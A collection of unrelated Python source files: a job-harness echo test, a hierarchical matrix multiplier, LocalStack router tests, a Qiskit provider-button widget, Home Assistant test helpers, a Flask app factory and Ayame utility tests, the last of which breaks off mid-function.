def test_many(startup_brain, proc, linux_harn):
proc.start()
while not proc.is_alive():
sleep(.5)
print("testing a lot of processes")
job_list = []
for i in range(0,7):
print("creating process " + str(i))
linux_harn.add_proc(Linharn_proc.wrap_loop)
linux_harn.procs[i].start()
echo = brain.queries.get_plugin_command("Harness", "echo", brain.connect())
echo_job = {
"Status" : "Waiting",
"StartTime": time(),
"JobTarget": SAMPLE_TARGET,
"JobCommand": echo
}
for i in range(0,25):
echo_job["JobCommand"]["Inputs"][0]["Value"] = "Hello World" + str(i)
job_list.append(deepcopy(echo_job))
inserted = brain.queries.insert_jobs(job_list, True, brain.connect())
NOW = time()
while time() - NOW < 120:
if brain.rethinkdb.db("Brain").table("Jobs").filter((brain.rethinkdb.row["Status"] == "Waiting") |
(brain.rethinkdb.row["Status"] == "Ready") |
(brain.rethinkdb.row["Status"] == "Pending") |
(brain.rethinkdb.row["Status"] == "Active")).is_empty().run(brain.connect()):
break
sleep(16)
for i in inserted["generated_keys"]:
print(brain.queries.get_job_by_id(i, brain.connect()))
print(time())
assert brain.queries.is_job_done(i, brain.connect())
assert brain.queries.get_output_content(i, conn=brain.connect())
|
fast_multiplier_utils.py
|
import tools
from multiprocessing import SimpleQueue, Process
import numpy as np
__all__ = ['fast_multiply']
def get_b(i, level_to_nodes, max_level, b):
indices = level_to_nodes[max_level][i].Indices
start, end = indices[0], indices[-1]
res = b[start:end + 1]
return res
def get_G(k, i, level_to_nodes, max_level, b):
if k == max_level:
res = tools.matmul(np.transpose(level_to_nodes[k][i].V), get_b(i, level_to_nodes, max_level, b))
else:
t = tools.matmul(np.transpose(level_to_nodes[k][i].Ws[0]), get_G(k + 1, 2*i, level_to_nodes, max_level, b))
s = tools.matmul(np.transpose(level_to_nodes[k][i].Ws[1]), get_G(k + 1, 2*i + 1, level_to_nodes, max_level, b))
res = t + s
return res
def get_F(k, i, level_to_nodes, max_level, A, b):
if k == 1 and i == 0:
res = [0] * level_to_nodes[k][0].Rs[0].shape[1]
elif i % 2 == 0:
res = tools.matmul(level_to_nodes[k][i].get_B_subblock(A), get_G(k, i + 1, level_to_nodes, max_level, b)) + \
tools.matmul(level_to_nodes[k - 1][i // 2].Rs[0], get_F(k - 1, i // 2, level_to_nodes, max_level, A, b))
else:
res = tools.matmul(level_to_nodes[k][i].get_B_subblock(A), get_G(k, i - 1, level_to_nodes, max_level, b)) + \
tools.matmul(level_to_nodes[k - 1][i // 2].Rs[1], get_F(k - 1, i // 2, level_to_nodes, max_level, A, b))
return res
def func(i, b, level_to_nodes, max_level, A, q):
s1 = level_to_nodes[max_level][i].get_D(A)
s2 = np.array(get_b(i, level_to_nodes, max_level, b))
s3 = level_to_nodes[max_level][i].U
s4 = get_F(max_level, i, level_to_nodes, max_level, A, b)
res = tools.matmul(s1, s2) + tools.matmul(s3, s4)
q.put((i, res))
return res
def batch_func(args):
for arg in args:
func(*arg)
def fast_multiply(partition, A, b, processes_count=4):
if partition.max_level == 1:
return tools.matmul(partition.level_to_nodes[partition.max_level][0].get_D(A), b)
res = {}
queue = SimpleQueue()
args = {}
tasks_count = len(partition.level_to_nodes[partition.max_level])
for k in range(0, tasks_count):
index = k % processes_count
args[index] = args.get(index, []) + [(k, b, partition.level_to_nodes, partition.max_level, A, queue)]
processes = []
for key in args.keys():
p = Process(target=batch_func, args=(args[key],))
p.Daemon = True
p.start()
processes.append(p)
for _ in range(tasks_count):
pair = queue.get()
res[pair[0]] = pair[1]
result = []
for k in range(0, tasks_count):
result += list(res[k])
return np.array(result)
|
test_router.py
|
import threading
from typing import List, Tuple
import pytest
import requests
import werkzeug
from werkzeug.exceptions import NotFound
from localstack.http import Request, Response, Router
from localstack.http.router import E, RequestArguments
from localstack.utils.common import get_free_tcp_port
def noop(*args, **kwargs):
"""Test dispatcher that does nothing"""
return Response()
class RequestCollector:
"""Test dispatcher that collects requests into a list"""
requests: List[Tuple[Request, E, RequestArguments]]
def __init__(self) -> None:
super().__init__()
self.requests = []
def __call__(self, request: Request, endpoint: E, args: RequestArguments) -> Response:
self.requests.append((request, endpoint, args))
return Response()
class TestRouter:
# these are sanity check for the router and dispatching logic. since the matching is done by werkzeug's Map,
# there is no need for thorough testing URL matching.
def test_dispatch_raises_not_found(self):
router = Router()
router.add("/foobar", noop)
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/foo"))
def test_default_dispatcher_invokes_correct_endpoint(self):
router = Router()
def index(_: Request, args) -> Response:
response = Response()
response.set_json(args)
return response
def users(_: Request, args) -> Response:
response = Response()
response.set_json(args)
return response
router.add("/", index)
router.add("/users/<int:user_id>", users)
assert router.dispatch(Request("GET", "/")).json == {}
assert router.dispatch(Request("GET", "/users/12")).json == {"user_id": 12}
def test_dispatch_with_host_matching(self):
router = Router()
def ep_all(_: Request, args) -> Response:
response = Response()
response.set_json(dict(method="all", **args))
return response
def ep_index1(_: Request, args) -> Response:
response = Response()
response.set_json(dict(method="1", **args))
return response
def ep_index2(_: Request, args) -> Response:
response = Response()
response.set_json(dict(method="2", **args))
return response
router.add("/", ep_index1, host="localhost:<port>")
router.add("/", ep_index2, host="localhost:12345")
router.add("/all", ep_all, host="<host>")
def invoke(path, server, port):
return router.dispatch(Request("GET", path, server=(server, port))).json
assert invoke("/", "localhost", 4566) == {"method": "1", "port": "4566"}
assert invoke("/", "localhost", 12345) == {"method": "2"}
assert invoke("/all", "127.0.0.1", None) == {"method": "all", "host": "127.0.0.1"}
assert invoke("/all", "127.0.0.1", 12345) == {"method": "all", "host": "127.0.0.1:12345"}
with pytest.raises(NotFound):
invoke("/", "localstack.cloud", None)
def test_custom_dispatcher(self):
collector = RequestCollector()
router = Router(dispatcher=collector)
router.add("/", "index")
router.add("/users/<int:id>", "users")
router.dispatch(Request("GET", "/"))
router.dispatch(Request("GET", "/users/12"))
_, endpoint, args = collector.requests[0]
assert endpoint == "index"
assert args == {}
_, endpoint, args = collector.requests[1]
assert endpoint == "users"
assert args == {"id": 12}
def test_remove_rule(self):
router = Router()
def index(_: Request, args) -> Response:
return Response(b"index")
def users(_: Request, args) -> Response:
return Response(b"users")
rule0 = router.add("/", index)
rule1 = router.add("/users/<int:user_id>", users)
assert router.dispatch(Request("GET", "/")).data == b"index"
assert router.dispatch(Request("GET", "/users/12")).data == b"users"
router.remove_rule(rule1)
assert router.dispatch(Request("GET", "/")).data == b"index"
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/users/12"))
router.remove_rule(rule0)
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/"))
with pytest.raises(NotFound):
assert router.dispatch(Request("GET", "/users/12"))
class TestWsgiIntegration:
def test_with_werkzeug(self):
# setup up router
router = Router()
def index(_: Request, args) -> Response:
return Response(b"index")
def echo_json(request: Request, args) -> Response:
response = Response()
response.set_json(request.json)
return response
def users(_: Request, args) -> Response:
response = Response()
response.set_json(args)
return response
router.add("/", index)
router.add("/users/<int:user_id>", users, host="<host>:<port>")
router.add("/echo/", echo_json, methods=["POST"])
# serve router through werkzeug
@werkzeug.Request.application
def app(request: werkzeug.Request) -> werkzeug.Response:
return router.dispatch(request)
host = "localhost"
port = get_free_tcp_port()
url = f"http://{host}:{port}"
server = werkzeug.serving.make_server(host, port, app=app, threaded=True)
t = threading.Thread(target=server.serve_forever)
t.start()
try:
resp = requests.get(f"{url}/")
assert resp.ok
assert resp.content == b"index"
resp = requests.get(f"{url}/users/123")
assert resp.ok
assert resp.json() == {"user_id": 123, "host": host, "port": str(port)}
resp = requests.get(f"{url}/users")
assert not resp.ok
resp = requests.post(f"{url}/echo", json={"foo": "bar", "a": 420})
assert resp.ok
assert resp.json() == {"foo": "bar", "a": 420}
finally:
server.shutdown()
t.join(timeout=10)
|
provider_buttons.py
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
import time
import threading
import pyperclip
import ipyvuetify as vue
import ipywidgets as wid
def _copy_text_thread(button):
""" A function that signals button text was copied to clipboard
"""
old_text = button.children[0]
hub, group, project = old_text.split('/')
pyperclip.copy("IBMQ.get_provider(hub='{hub}', group='{group}', project='{project}')" \
.format(hub=hub, group=group, project=project))
button.children = ['Copied to clipboard.']
time.sleep(1)
button.children = [old_text]
def _copy_text(*args):
thread = threading.Thread(target=_copy_text_thread, args=(args[0],))
thread.start()
def provider_buttons(providers):
""" Generates a collection of provider buttons for a backend.
Parameters:
providers (list): A list of providers.
Returns:
VBox: An ipywidgets VBox instance.
"""
vbox_buttons = []
for pro in providers:
button = wid.Box(children=[vue.Btn(color='#f5f5f5', small=True,
children=[pro],
style_="font-family: Arial, sans-serif; font-size:10px;")],
layout=wid.Layout(margin="0px 0px 2px 0px",
width='350px'))
button.children[0].on_event('click', _copy_text)
vbox_buttons.append(button)
return wid.VBox(children=vbox_buttons,
layout=wid.Layout(width='350px',
max_width='350px'))
|
common.py
|
"""Test the helper method for writing tests."""
import asyncio
from collections import OrderedDict
from datetime import timedelta
import functools as ft
import json
import os
import sys
from unittest.mock import patch, MagicMock, Mock
from io import StringIO
import logging
import threading
from contextlib import contextmanager
from homeassistant import auth, core as ha, data_entry_flow, config_entries
from homeassistant.auth import (
models as auth_models, auth_store, providers as auth_providers)
from homeassistant.setup import setup_component, async_setup_component
from homeassistant.config import async_process_component_config
from homeassistant.helpers import (
intent, entity, restore_state, entity_registry,
entity_platform, storage)
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.dt as date_util
import homeassistant.util.yaml as yaml
from homeassistant.const import (
STATE_ON, STATE_OFF, DEVICE_DEFAULT_NAME, EVENT_TIME_CHANGED,
EVENT_STATE_CHANGED, EVENT_PLATFORM_DISCOVERED, ATTR_SERVICE,
ATTR_DISCOVERED, SERVER_PORT, EVENT_HOMEASSISTANT_CLOSE)
from homeassistant.components import mqtt, recorder
from homeassistant.util.async_ import (
run_callback_threadsafe, run_coroutine_threadsafe)
_TEST_INSTANCE_PORT = SERVER_PORT
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = 'https://example.com/app'
CLIENT_REDIRECT_URI = 'https://example.com/app/callback'
def threadsafe_callback_factory(func):
"""Create threadsafe functions out of callbacks.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_callback_threadsafe(
hass.loop, ft.partial(func, *args, **kwargs)).result()
return threadsafe
def threadsafe_coroutine_factory(func):
"""Create threadsafe functions out of coroutine.
Callback needs to have `hass` as first argument.
"""
@ft.wraps(func)
def threadsafe(*args, **kwargs):
"""Call func threadsafe."""
hass = args[0]
return run_coroutine_threadsafe(
func(*args, **kwargs), hass.loop).result()
return threadsafe
def get_test_config_dir(*add_path):
"""Return a path to a test config dir."""
return os.path.join(os.path.dirname(__file__), 'testing_config', *add_path)
def get_test_home_assistant():
"""Return a Home Assistant object pointing at test config directory."""
if sys.platform == "win32":
loop = asyncio.ProactorEventLoop()
else:
loop = asyncio.new_event_loop()
hass = loop.run_until_complete(async_test_home_assistant(loop))
stop_event = threading.Event()
def run_loop():
"""Run event loop."""
# pylint: disable=protected-access
loop._thread_ident = threading.get_ident()
loop.run_forever()
stop_event.set()
orig_stop = hass.stop
def start_hass(*mocks):
"""Start hass."""
run_coroutine_threadsafe(hass.async_start(), loop=hass.loop).result()
def stop_hass():
"""Stop hass."""
orig_stop()
stop_event.wait()
loop.close()
hass.start = start_hass
hass.stop = stop_hass
threading.Thread(name="LoopThread", target=run_loop, daemon=False).start()
return hass
# pylint: disable=protected-access
@asyncio.coroutine
def async_test_home_assistant(loop):
"""Return a Home Assistant object pointing at test config dir."""
hass = ha.HomeAssistant(loop)
hass.config.async_load = Mock()
store = auth_store.AuthStore(hass)
hass.auth = auth.AuthManager(hass, store, {})
ensure_auth_manager_loaded(hass.auth)
INSTANCES.append(hass)
orig_async_add_job = hass.async_add_job
def async_add_job(target, *args):
"""Add a magic mock."""
if isinstance(target, Mock):
return mock_coro(target(*args))
return orig_async_add_job(target, *args)
hass.async_add_job = async_add_job
hass.config.location_name = 'test home'
hass.config.config_dir = get_test_config_dir()
hass.config.latitude = 32.87336
hass.config.longitude = -117.22743
hass.config.elevation = 0
hass.config.time_zone = date_util.get_time_zone('US/Pacific')
hass.config.units = METRIC_SYSTEM
hass.config.skip_pip = True
hass.config_entries = config_entries.ConfigEntries(hass, {})
hass.config_entries._entries = []
hass.config_entries._store._async_ensure_stop_listener = lambda: None
hass.state = ha.CoreState.running
# Mock async_start
orig_start = hass.async_start
@asyncio.coroutine
def mock_async_start():
"""Start the mocking."""
# We only mock time during tests and we want to track tasks
with patch('homeassistant.core._async_create_timer'), \
patch.object(hass, 'async_stop_track_tasks'):
yield from orig_start()
hass.async_start = mock_async_start
@ha.callback
def clear_instance(event):
"""Clear global instance."""
INSTANCES.remove(hass)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, clear_instance)
return hass
def get_test_instance_port():
"""Return unused port for running test instance.
The socket that holds the default port does not get released when we stop
HA in a different test case. Until I have figured out what is going on,
let's run each test on a different port.
"""
global _TEST_INSTANCE_PORT
_TEST_INSTANCE_PORT += 1
return _TEST_INSTANCE_PORT
@ha.callback
def async_mock_service(hass, domain, service, schema=None):
"""Set up a fake service & return a calls log list to this service."""
calls = []
@ha.callback
def mock_service_log(call): # pylint: disable=unnecessary-lambda
"""Mock service call."""
calls.append(call)
hass.services.async_register(
domain, service, mock_service_log, schema=schema)
return calls
mock_service = threadsafe_callback_factory(async_mock_service)
@ha.callback
def async_mock_intent(hass, intent_typ):
"""Set up a fake intent handler."""
intents = []
class MockIntentHandler(intent.IntentHandler):
intent_type = intent_typ
@asyncio.coroutine
def async_handle(self, intent):
"""Handle the intent."""
intents.append(intent)
return intent.create_response()
intent.async_register(hass, MockIntentHandler())
return intents
@ha.callback
def async_fire_mqtt_message(hass, topic, payload, qos=0, retain=False):
"""Fire the MQTT message."""
if isinstance(payload, str):
payload = payload.encode('utf-8')
msg = mqtt.Message(topic, payload, qos, retain)
hass.async_run_job(hass.data['mqtt']._mqtt_on_message, None, None, msg)
fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)
@ha.callback
def async_fire_time_changed(hass, time):
"""Fire a time changes event."""
hass.bus.async_fire(EVENT_TIME_CHANGED, {'now': time})
fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)
def fire_service_discovered(hass, service, info):
"""Fire the MQTT message."""
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: service,
ATTR_DISCOVERED: info
})
def load_fixture(filename):
"""Load a fixture."""
path = os.path.join(os.path.dirname(__file__), 'fixtures', filename)
with open(path, encoding='utf-8') as fptr:
return fptr.read()
def mock_state_change_event(hass, new_state, old_state=None):
"""Mock state change envent."""
event_data = {
'entity_id': new_state.entity_id,
'new_state': new_state,
}
if old_state:
event_data['old_state'] = old_state
hass.bus.fire(EVENT_STATE_CHANGED, event_data)
@asyncio.coroutine
def async_mock_mqtt_component(hass, config=None):
"""Mock the MQTT component."""
if config is None:
config = {mqtt.CONF_BROKER: 'mock-broker'}
with patch('paho.mqtt.client.Client') as mock_client:
mock_client().connect.return_value = 0
mock_client().subscribe.return_value = (0, 0)
mock_client().publish.return_value = (0, 0)
result = yield from async_setup_component(hass, mqtt.DOMAIN, {
mqtt.DOMAIN: config
})
assert result
hass.data['mqtt'] = MagicMock(spec_set=hass.data['mqtt'],
wraps=hass.data['mqtt'])
return hass.data['mqtt']
mock_mqtt_component = threadsafe_coroutine_factory(async_mock_mqtt_component)
@ha.callback
def mock_component(hass, component):
"""Mock a component is setup."""
if component in hass.config.components:
AssertionError("Component {} is already setup".format(component))
hass.config.components.add(component)
def mock_registry(hass, mock_entries=None):
"""Mock the Entity Registry."""
registry = entity_registry.EntityRegistry(hass)
registry.entities = mock_entries or {}
hass.data[entity_registry.DATA_REGISTRY] = registry
return registry
class MockUser(auth_models.User):
"""Mock a user in Home Assistant."""
def __init__(self, id='mock-id', is_owner=False, is_active=True,
name='Mock User', system_generated=False):
"""Initialize mock user."""
super().__init__(
id=id, is_owner=is_owner, is_active=is_active, name=name,
system_generated=system_generated)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
return self.add_to_auth_manager(hass.auth)
def add_to_auth_manager(self, auth_mgr):
"""Test helper to add entry to hass."""
ensure_auth_manager_loaded(auth_mgr)
auth_mgr._store._users[self.id] = self
return self
async def register_auth_provider(hass, config):
"""Helper to register an auth provider."""
provider = await auth_providers.auth_provider_from_config(
hass, hass.auth._store, config)
assert provider is not None, 'Invalid config specified'
key = (provider.type, provider.id)
providers = hass.auth._providers
if key in providers:
raise ValueError('Provider already registered')
providers[key] = provider
return provider
@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
"""Ensure an auth manager is considered loaded."""
store = auth_mgr._store
if store._users is None:
store._users = OrderedDict()
class MockModule:
"""Representation of a fake module."""
# pylint: disable=invalid-name
def __init__(self, domain=None, dependencies=None, setup=None,
requirements=None, config_schema=None, platform_schema=None,
async_setup=None, async_setup_entry=None,
async_unload_entry=None):
"""Initialize the mock module."""
self.DOMAIN = domain
self.DEPENDENCIES = dependencies or []
self.REQUIREMENTS = requirements or []
if config_schema is not None:
self.CONFIG_SCHEMA = config_schema
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if setup is not None:
# We run this in executor, wrap it in function
self.setup = lambda *args: setup(*args)
if async_setup is not None:
self.async_setup = async_setup
if setup is None and async_setup is None:
self.async_setup = mock_coro_func(True)
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if async_unload_entry is not None:
self.async_unload_entry = async_unload_entry
class MockPlatform:
"""Provide a fake platform."""
# pylint: disable=invalid-name
def __init__(self, setup_platform=None, dependencies=None,
platform_schema=None, async_setup_platform=None,
async_setup_entry=None, scan_interval=None):
"""Initialize the platform."""
self.DEPENDENCIES = dependencies or []
if platform_schema is not None:
self.PLATFORM_SCHEMA = platform_schema
if scan_interval is not None:
self.SCAN_INTERVAL = scan_interval
if setup_platform is not None:
# We run this in executor, wrap it in function
self.setup_platform = lambda *args: setup_platform(*args)
if async_setup_platform is not None:
self.async_setup_platform = async_setup_platform
if async_setup_entry is not None:
self.async_setup_entry = async_setup_entry
if setup_platform is None and async_setup_platform is None:
self.async_setup_platform = mock_coro_func()
class MockEntityPlatform(entity_platform.EntityPlatform):
"""Mock class with some mock defaults."""
def __init__(
self, hass,
logger=None,
domain='test_domain',
platform_name='test_platform',
platform=None,
scan_interval=timedelta(seconds=15),
entity_namespace=None,
async_entities_added_callback=lambda: None
):
"""Initialize a mock entity platform."""
if logger is None:
logger = logging.getLogger('homeassistant.helpers.entity_platform')
# Otherwise the constructor will blow up.
if (isinstance(platform, Mock) and
isinstance(platform.PARALLEL_UPDATES, Mock)):
platform.PARALLEL_UPDATES = 0
super().__init__(
hass=hass,
logger=logger,
domain=domain,
platform_name=platform_name,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=async_entities_added_callback,
)
class MockToggleDevice(entity.ToggleEntity):
"""Provide a mock toggle device."""
def __init__(self, name, state):
"""Initialize the mock device."""
self._name = name or DEVICE_DEFAULT_NAME
self._state = state
self.calls = []
@property
def name(self):
"""Return the name of the device if any."""
self.calls.append(('name', {}))
return self._name
@property
def state(self):
"""Return the name of the device if any."""
self.calls.append(('state', {}))
return self._state
@property
def is_on(self):
"""Return true if device is on."""
self.calls.append(('is_on', {}))
return self._state == STATE_ON
def turn_on(self, **kwargs):
"""Turn the device on."""
self.calls.append(('turn_on', kwargs))
self._state = STATE_ON
def turn_off(self, **kwargs):
"""Turn the device off."""
self.calls.append(('turn_off', kwargs))
self._state = STATE_OFF
def last_call(self, method=None):
"""Return the last call."""
if not self.calls:
return None
if method is None:
return self.calls[-1]
try:
return next(call for call in reversed(self.calls)
if call[0] == method)
except StopIteration:
return None
class MockConfigEntry(config_entries.ConfigEntry):
"""Helper for creating config entries that adds some defaults."""
def __init__(self, *, domain='test', data=None, version=0, entry_id=None,
source=data_entry_flow.SOURCE_USER, title='Mock Title',
state=None):
"""Initialize a mock config entry."""
kwargs = {
'entry_id': entry_id or 'mock-id',
'domain': domain,
'data': data or {},
'version': version,
'title': title
}
if source is not None:
kwargs['source'] = source
if state is not None:
kwargs['state'] = state
super().__init__(**kwargs)
def add_to_hass(self, hass):
"""Test helper to add entry to hass."""
hass.config_entries._entries.append(self)
def add_to_manager(self, manager):
"""Test helper to add entry to entry manager."""
manager._entries.append(self)
def patch_yaml_files(files_dict, endswith=True):
"""Patch load_yaml with a dictionary of yaml files."""
# match using endswith, start search with longest string
matchlist = sorted(list(files_dict.keys()), key=len) if endswith else []
def mock_open_f(fname, **_):
"""Mock open() in the yaml module, used by load_yaml."""
# Return the mocked file on full match
if fname in files_dict:
_LOGGER.debug("patch_yaml_files match %s", fname)
res = StringIO(files_dict[fname])
setattr(res, 'name', fname)
return res
# Match using endswith
for ends in matchlist:
if fname.endswith(ends):
_LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname)
res = StringIO(files_dict[ends])
setattr(res, 'name', fname)
return res
# Fallback for hass.components (i.e. services.yaml)
if 'homeassistant/components' in fname:
_LOGGER.debug("patch_yaml_files using real file: %s", fname)
return open(fname, encoding='utf-8')
# Not found
raise FileNotFoundError("File not found: {}".format(fname))
return patch.object(yaml, 'open', mock_open_f, create=True)
def mock_coro(return_value=None):
"""Return a coro that returns a value."""
return mock_coro_func(return_value)()
def mock_coro_func(return_value=None):
"""Return a method to create a coro function that returns a value."""
@asyncio.coroutine
def coro(*args, **kwargs):
"""Fake coroutine."""
return return_value
return coro
@contextmanager
def assert_setup_component(count, domain=None):
"""Collect valid configuration from setup_component.
- count: The amount of valid platforms that should be setup
- domain: The domain to count is optional. It can be automatically
determined most of the time
Use as a context manager around setup.setup_component
with assert_setup_component(0) as result_config:
setup_component(hass, domain, start_config)
# using result_config is optional
"""
config = {}
@ha.callback
def mock_psc(hass, config_input, domain):
"""Mock the prepare_setup_component to capture config."""
res = async_process_component_config(
hass, config_input, domain)
config[domain] = None if res is None else res.get(domain)
_LOGGER.debug("Configuration for %s, Validated: %s, Original %s",
domain, config[domain], config_input.get(domain))
return res
assert isinstance(config, dict)
with patch('homeassistant.config.async_process_component_config',
mock_psc):
yield config
if domain is None:
assert len(config) == 1, ('assert_setup_component requires DOMAIN: {}'
.format(list(config.keys())))
domain = list(config.keys())[0]
res = config.get(domain)
res_len = 0 if res is None else len(res)
assert res_len == count, 'setup_component failed, expected {} got {}: {}' \
.format(count, res_len, res)
def init_recorder_component(hass, add_config=None):
"""Initialize the recorder."""
config = dict(add_config) if add_config else {}
config[recorder.CONF_DB_URL] = 'sqlite://' # In memory DB
with patch('homeassistant.components.recorder.migration.migrate_schema'):
assert setup_component(hass, recorder.DOMAIN,
{recorder.DOMAIN: config})
assert recorder.DOMAIN in hass.config.components
_LOGGER.info("In-memory recorder successfully started")
def mock_restore_cache(hass, states):
"""Mock the DATA_RESTORE_CACHE."""
key = restore_state.DATA_RESTORE_CACHE
hass.data[key] = {
state.entity_id: state for state in states}
_LOGGER.debug('Restore cache: %s', hass.data[key])
assert len(hass.data[key]) == len(states), \
"Duplicate entity_id? {}".format(states)
hass.state = ha.CoreState.starting
mock_component(hass, recorder.DOMAIN)
class MockDependency:
"""Decorator to mock install a dependency."""
def __init__(self, root, *args):
"""Initialize decorator."""
self.root = root
self.submodules = args
def __enter__(self):
"""Start mocking."""
def resolve(mock, path):
"""Resolve a mock."""
if not path:
return mock
return resolve(getattr(mock, path[0]), path[1:])
base = MagicMock()
to_mock = {
"{}.{}".format(self.root, tom): resolve(base, tom.split('.'))
for tom in self.submodules
}
to_mock[self.root] = base
self.patcher = patch.dict('sys.modules', to_mock)
self.patcher.start()
return base
def __exit__(self, *exc):
"""Stop mocking."""
self.patcher.stop()
return False
def __call__(self, func):
"""Apply decorator."""
def run_mocked(*args, **kwargs):
"""Run with mocked dependencies."""
with self as base:
args = list(args) + [base]
func(*args, **kwargs)
return run_mocked
class MockEntity(entity.Entity):
"""Mock Entity class."""
def __init__(self, **values):
"""Initialize an entity."""
self._values = values
if 'entity_id' in values:
self.entity_id = values['entity_id']
@property
def name(self):
"""Return the name of the entity."""
return self._handle('name')
@property
def should_poll(self):
"""Return the ste of the polling."""
return self._handle('should_poll')
@property
def unique_id(self):
"""Return the unique ID of the entity."""
return self._handle('unique_id')
@property
def available(self):
"""Return True if entity is available."""
return self._handle('available')
def _handle(self, attr):
"""Helper for the attributes."""
if attr in self._values:
return self._values[attr]
return getattr(super(), attr)
@contextmanager
def mock_storage(data=None):
"""Mock storage.
Data is a dict {'key': {'version': version, 'data': data}}
Written data will be converted to JSON to ensure JSON parsing works.
"""
if data is None:
data = {}
orig_load = storage.Store._async_load
async def mock_async_load(store):
"""Mock version of load."""
if store._data is None:
# No data to load
if store.key not in data:
return None
mock_data = data.get(store.key)
if 'data' not in mock_data or 'version' not in mock_data:
_LOGGER.error('Mock data needs "version" and "data"')
raise ValueError('Mock data needs "version" and "data"')
store._data = mock_data
# Route through original load so that we trigger migration
loaded = await orig_load(store)
_LOGGER.info('Loading data for %s: %s', store.key, loaded)
return loaded
def mock_write_data(store, path, data_to_write):
"""Mock version of write data."""
# To ensure that the data can be serialized
_LOGGER.info('Writing data to %s: %s', store.key, data_to_write)
data[store.key] = json.loads(json.dumps(data_to_write))
with patch('homeassistant.helpers.storage.Store._async_load',
side_effect=mock_async_load, autospec=True), \
patch('homeassistant.helpers.storage.Store._write_data',
side_effect=mock_write_data, autospec=True):
yield data
async def flush_store(store):
"""Make sure all delayed writes of a store are written."""
if store._data is None:
return
await store._async_handle_write_data()
|
__init__.py
|
from threading import Thread
from flask import Flask
from flask import request
from flask_babel import Babel
from flask_redis import FlaskRedis
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
babel = Babel()
redis = FlaskRedis()
db = SQLAlchemy()
migrate = Migrate()
def create_app():
app = Flask(__name__)
# load config
from . import config
app.config.from_object(config)
# blueprint init
from . import views
for view in views.__all__:
app.register_blueprint(getattr(views, view).__getattribute__("bp"))
# template filter init
from . import template_filter
for name in template_filter.filter_list:
app.add_template_filter(f=getattr(template_filter, name), name=name)
# i18n
babel.init_app(app=app)
@babel.localeselector
def get_locale():
return app.config['LANGUAGE_MAP'][request.accept_languages.best_match(app.config['LANGUAGE_MAP'].keys())]
# client init
redis.init_app(app=app)
db.init_app(app=app)
migrate.init_app(app=app, db=db)
# background task
from . import task
Thread(target=task.core, args=(app,), daemon=True).start()
return app
|
test_util.py
|
#
# test_util
#
# Copyright (c) 2011-2021 Akinori Hattori <hattya@gmail.com>
#
# SPDX-License-Identifier: MIT
#
import collections.abc
import os
import pickle
import random
import threading
import time
from ayame import util
from base import AyameTestCase
class UtilTestCase(AyameTestCase):
def test_fqon_of_builtin(self):
self.assertEqual(util.fqon_of(None), 'NoneType')
self.assertEqual(util.fqon_of(True), 'bool')
self.assertEqual(util.fqon_of(False), 'bool')
self.assertEqual(util.fqon_of(''), 'str')
self.assertEqual(util.fqon_of([]), 'list')
self.assertEqual(util.fqon_of({}), 'dict')
self.assertEqual(util.fqon_of(1), 'int')
self.assertEqual(util.fqon_of(3.14), 'float')
def test_fqon_of_class(self):
class C:
pass
self.assertEqual(util.fqon_of(C), __name__ + '.C')
self.assertEqual(util.fqon_of(C()), __name__ + '.C')
C.__module__ = None
self.assertEqual(util.fqon_of(C), '<unknown>.C')
self.assertEqual(util.fqon_of(C()), '<unknown>.C')
def test_fqon_of_function(self):
def f():
pass
self.assertEqual(util.fqon_of(f), __name__ + '.f')
del f.__module__
self.assertEqual(util.fqon_of(f), '<unknown>.f')
f = lambda: None
self.assertEqual(util.fqon_of(f), __name__ + '.<lambda>')
del f.__module__
self.assertEqual(util.fqon_of(f), '<unknown>.<lambda>')
def test_fqon_of_module(self):
self.assertEqual(util.fqon_of(os), 'os')
self.assertEqual(util.fqon_of(util), 'ayame.util')
def test_to_bytes(self):
# iroha in hiragana
v = util.to_bytes('\u3044\u308d\u306f')
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'\xe3\x81\x84\xe3\x82\x8d\xe3\x81\xaf')
v = util.to_bytes('\u3044\u308d\u306f', 'ascii', 'ignore')
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'')
with self.assertRaises(UnicodeEncodeError):
util.to_bytes('\u3044\u308d\u306f', 'ascii')
v = util.to_bytes(b'abc')
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'abc')
v = util.to_bytes(0)
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'0')
v = util.to_bytes(3.14)
self.assertIsInstance(v, bytes)
self.assertEqual(v, b'3.14')
def test_to_list(self):
self.assertEqual(util.to_list(None), [])
self.assertEqual(util.to_list('abc'), ['abc'])
self.assertEqual(util.to_list(''), [''])
self.assertEqual(util.to_list(1), [1])
self.assertEqual(util.to_list(3.14), [3.14])
self.assertEqual(util.to_list((1,)), [1])
self.assertEqual(util.to_list([1]), [1])
self.assertEqual(util.to_list({'a': 1}), ['a'])
def test_new_token(self):
a = util.new_token()
b = util.new_token()
self.assertNotEqual(a, b)
def test_iterable(self):
self.assertTrue(util.iterable(()))
self.assertTrue(util.iterable([]))
self.assertTrue(util.iterable({}))
self.assertFalse(util.iterable(''))
def test_filter_dict(self):
class LowerDict(util.FilterDict):
def __convert__(self, key):
